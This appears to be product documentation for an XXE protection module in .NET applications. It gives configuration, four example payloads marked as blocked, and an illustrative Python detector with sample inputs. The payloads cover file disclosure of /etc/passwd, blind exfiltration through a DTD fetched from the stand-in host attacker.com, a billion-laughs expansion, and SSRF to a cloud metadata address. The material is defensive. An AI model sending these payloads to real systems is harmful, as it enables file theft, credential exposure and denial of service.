XXE Protection

Protection Module: XmlExternalEntity

Prevents XML External Entity (XXE) attacks by securing XML parsing and blocking dangerous entity expansion.

Available for:

  • ASP.NET Core
  • ASP.NET Framework
  • Azure Functions
  • SOAP Services

How It Works

XXE Protection monitors XML parsing operations to prevent external entity attacks.

Detection Methods:

  • DOCTYPE Detection - Identifies <!DOCTYPE> declarations
  • External Entity Detection - Detects <!ENTITY> with external references
  • Parameter Entity Detection - Identifies parameter entity usage
  • DTD Processing Analysis - Monitors DTD loading attempts
  • SYSTEM/PUBLIC Keyword Detection - Blocks external resource loading

Attack Types Detected:

  • Classic XXE (file disclosure)
  • Blind XXE (out-of-band data exfiltration)
  • SSRF via XXE
  • Denial of Service (billion laughs attack)
  • Local file inclusion

Configuration

JSON
{
  "protections": {
    "XmlExternalEntity": {
      "enabled": true,
      "action": "block"
    }
  }
}

ASP.NET Core

C#
builder.Services.AddBytehideMonitor(monitor => monitor
    .WithProtection(ProtectionModuleType.XmlExternalEntity, ActionType.Block)
);

Attack Examples

Classic XXE - File Disclosure

XML
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->

Blind XXE - OOB Exfiltration

XML
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>
<!-- Status: BLOCKED -->

Billion Laughs Attack

XML
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
<!-- Status: BLOCKED -->

SSRF via XXE

XML
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->
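The Python script below is added here as an illustration and is not the XmlExternalEntity module's own code: it applies the detection methods listed under How It Works to the raw text of the four attack examples above and returns the findings and the resulting block decision. The finding names and the expansion threshold of 100 are assumptions chosen for the illustration.

```python
import re
from urllib.parse import urlsplit

# Stand-in for the detection methods listed above, run on the raw XML text before
# it reaches a parser. Not the product's code; names and thresholds are assumptions.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
PARAM_RE = re.compile(r"<!ENTITY\s+%|%\w+;")
EXTERNAL_RE = re.compile(r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>\w+)\s+'
                         r'(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"(?P<uri>[^"]*)"', re.I)
INTERNAL_RE = re.compile(r'<!ENTITY\s+(?P<name>\w+)\s+"(?P<text>[^"]*)"')
REF_RE = re.compile(r"&(\w+);")

def expansion_count(name, table, seen=()):
    """Number of leaf expansions one reference to `name` produces (billion-laughs amplification)."""
    if name in seen or name not in table:       # cycle or undefined entity: count as one leaf
        return 1
    refs = REF_RE.findall(table[name])
    return sum(expansion_count(r, table, seen + (name,)) for r in refs) if refs else 1

def scan_xml(doc, dos_threshold=100):
    """Return the findings for one document and whether a 'block' action would fire."""
    findings = []
    if DOCTYPE_RE.search(doc):
        findings.append("doctype")               # a DTD is present at all
    if PARAM_RE.search(doc):
        findings.append("parameter-entity")      # <!ENTITY % ...> or %name; usage
    for m in EXTERNAL_RE.finditer(doc):          # SYSTEM/PUBLIC: external resource loading
        scheme = urlsplit(m.group("uri")).scheme.lower()
        if m.group("param"):
            findings.append("blind-xxe")         # parameter entity pulling an external DTD
        elif scheme == "file":
            findings.append("classic-xxe")       # file disclosure / local file inclusion
        elif scheme in ("http", "https", "ftp"):
            findings.append("ssrf")              # server-side request to a URL
        else:
            findings.append("external-entity")
    table = {m.group("name"): m.group("text") for m in INTERNAL_RE.finditer(doc)}
    worst = max((expansion_count(n, table) for n in table), default=0)
    if worst >= dos_threshold:
        findings.append("billion-laughs")        # nested internal entities amplify expansion
    blocked = any(f != "doctype" for f in findings)  # a bare DTD is reported, not blocked
    return {"blocked": blocked, "findings": findings, "max_expansion": worst}

# Constructed sample inputs, condensed from the attack examples on this page.
CLASSIC = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
BLIND = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]><root/>'
SSRF = '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>'
LAUGHS = ('<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol1 "' + "&lol;" * 10
          + '"><!ENTITY lol2 "' + "&lol1;" * 10 + '">]><lolz>&lol2;</lolz>')
BENIGN = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY co "Acme">]><r>&co;</r>'
```

In .NET the equivalent hard stop is an XmlReaderSettings with DtdProcessing = DtdProcessing.Prohibit and XmlResolver = null, which rejects every DOCTYPE before any of these patterns needs to be examined.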

Platform Compatibility

Platform             Support / Notes
ASP.NET Core         Full support
ASP.NET Framework    Full support
Azure Functions      HTTP triggers
SOAP Services        WCF services
